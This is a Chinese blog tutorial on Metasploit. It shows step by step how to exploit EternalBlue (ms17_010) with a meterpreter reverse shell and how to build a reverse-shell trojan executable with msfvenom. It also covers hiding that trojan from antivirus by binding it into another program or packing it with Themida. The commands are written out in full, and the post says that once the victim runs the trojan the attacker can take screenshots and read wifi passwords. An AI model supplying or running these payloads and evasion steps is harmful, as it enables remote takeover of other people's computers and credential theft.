kali 渗透工具 - mestaploit

永恒之蓝漏洞的小知识: 黑客通过改造 永恒之蓝 制作 wannacry 制作病毒入侵高校内网。

mestaploit 攻击永恒之蓝流程:

  1. 使用模块 msfconsole
  2. 配置required 模块参数
  3. 运行,开始监听主机
msfconsole

 主要模块  -  选择使用模块

search ms17_010  


use exploit/windows/smb/ms17_010_eternalblue  # 同 use  0

主要options参数说明(仅主要查看 required 参数)

set payload windows/x64/meterpreter/reverse_tcp

选择载荷payload (若使用liunx 替换 window 字段即可)

 选择攻击IP对象,需同一网段的可访问主机

set RHOSTS 192.168.0.x    # 若扫描整个网段  192.168.0.0-254

set lport 999             # 端口配置,可随机配置无占用端口

run                       # 运行测试

目前测试的是一台 window11 系统,攻击失败了(当前漏洞早修复了哈哈)

 

使用kali 渗透工具生成木马文件 用于远程控制

主要工具 msfvenom 说明:用来生成后门的软件,监听对方主机上线并控制

msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.x.x lport=999 -f exe -o demo.exe

options:

-p                payload 载体

window/x64/meterpreter_reverse_tcp                 系统作用name

lhost           kali  的ip

lport           自定义端口

-f                format 格式 (自定义)

-o               输出文件

 生成木马文件demo.exe成功

接下来启动 msfconsole 工具 并开始监听目标主机上线

检查payload载体  --- 配置所需载体

msfconsole         # 启动工具

show options       # 检查参数

set payload windows/x64/meterpreter_reverse_tcp   # 配置payload

 启动监听,等待目标主机上线

在目标主机双击木马文件(测试前需要关闭杀毒软件,不然被删除拦截哈哈)

 这时候就可以远程控制目标主机  嘿嘿嘿~

查看目标主机信息

 截图,控制主机,查看wifi密码

截图展示:(PS: 正在疯狂学习ing 哈哈)

 更多选项参数请浏览博客:

Metasploit后渗透命令大全讲解——超详细_stdapi_sys_power_exitwindows: operation failed: 13-CSDN博客

进阶知识:如何躲避杀毒软件,实现免杀

方法1: 可将木马文件捆绑到xxx软件来躲避杀毒软件

msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.79.128 lport=999 -f exe -x xxx.exe -o xxx.exe

方法2:加壳、加密   ---   将木马文件放到加密软件 实现加壳来躲避 杀毒软件

工具: Themida 工具

下载地址:Themida - Download


 

PS:  学习网安知识,提高自身安全知识,多认证官方渠道,避免病毒攻击 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值